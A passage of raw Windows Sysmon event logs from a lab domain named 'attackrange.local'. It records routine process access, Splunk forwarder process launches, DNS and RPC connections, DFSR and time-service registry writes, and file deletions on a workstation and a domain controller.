2.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151740Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.225{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151739Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.225{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151738Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.225{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151737Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.225{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-715D-60CA-2A0D-00000000D101}760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151736Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.225{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-715D-60CA-2A0D-00000000D101}760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151735Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.226{39BD8DE3-715D-60CA-2A0D-00000000D101}760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000151734Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.444{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58416-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000105096Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:10.262{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F27075E436E3ACEA75EC622033C5345C,SHA256=781E33DFCD105D49A503D885B59D494229F4E025F4791F8578271A9E20AB13D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151746Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:10.889{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A57CCF762765EA2ACB26B5C0D9E8FCB7,SHA256=D7D27C3612C0EA158E2CB80B05D94939EDAABB9B6DB78D3107E175F381FB8F4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105109Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.480{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.14win-dc-681.attackrange.local56170- 354300x8000000000000000105108Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.480{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-681.attackrange.local56170-false10.0.1.14win-dc-681.attackrange.local53domain 354300x8000000000000000105107Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.480{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local49653- 354300x8000000000000000105106Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.479{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local49653-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local53domain 354300x8000000000000000105105Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.472{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55433-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local49666- 354300x8000000000000000105104Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.472{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55433-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local49666- 354300x8000000000000000105103Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.471{54715871-FD18-60C9-0D00-00000000CF01}908C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55432-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local135epmap 354300x8000000000000000105102Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:09.471{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55432-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local135epmap 23542300x8000000000000000105101Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.632{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71F316E4A45E5836DE74F66033D5B8BF,SHA256=047F33BEC5AE98EF19ED90FC7941882BCC692ED0F6662EDD2C4AF3515342FE44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105100Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:11.628{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4D2E566811A27BC60E3811A76675F36,SHA256=69596EF02FE17E9BB4686D24C2552D1ED896D2BDC69F699B824C3EE02C3E8C54,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000105099Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:47:11.374{54715871-FD28-60C9-2E00-00000000CF01}3064C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x8000000000000000105098Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:47:11.370{54715871-FD28-60C9-2E00-00000000CF01}3064C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\A6D15710-4869-46F1-9948-993AEAC11038\Config SourceDWORD (0x00000001) 13241300x8000000000000000105097Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:47:11.370{54715871-FD28-60C9-2E00-00000000CF01}3064C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\A6D15710-4869-46F1-9948-993AEAC11038\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_A6D15710-4869-46F1-9948-993AEAC11038.XML 23542300x8000000000000000151765Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.912{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABFB153CB3322BEDEE4A04E0ACFD9B22,SHA256=69583FD27F8CA580AF40514FE85B94991DCDE1B6BA681CE2418E6F1D845B6A8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151764Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.273{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-715F-60CA-2B0D-00000000D101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151763Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.273{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151762Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.273{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151761Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.273{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151760Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.273{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151759Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.273{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-715F-60CA-2B0D-00000000D101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151758Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.273{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-715F-60CA-2B0D-00000000D101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151757Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:11.275{39BD8DE3-715F-60CA-2B0D-00000000D101}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x8000000000000000151756Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000151755Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x017f63a4) 13241300x8000000000000000151754Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d762f0-0xc7572714) 13241300x8000000000000000151753Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d762f9-0x291b8f14) 13241300x8000000000000000151752Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d76301-0x8adff714) 13241300x8000000000000000151751Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000151750Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x017f63a4) 13241300x8000000000000000151749Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d762f0-0xc7572714) 13241300x8000000000000000151748Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d762f9-0x291b8f14) 13241300x8000000000000000151747Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-SetValue2021-06-16 21:47:11.258{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d76301-0x8adff714) 23542300x8000000000000000105125Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.995{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D96648F885C75AE53B97B3AA0BFB8A4,SHA256=8CC622A119FBA4F71633AC9162B880F722333950AF0E0156D7C86A7F0FA6294C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105124Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.995{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7160-60CA-3613-00000000CF01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105123Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:12.993{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105122Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 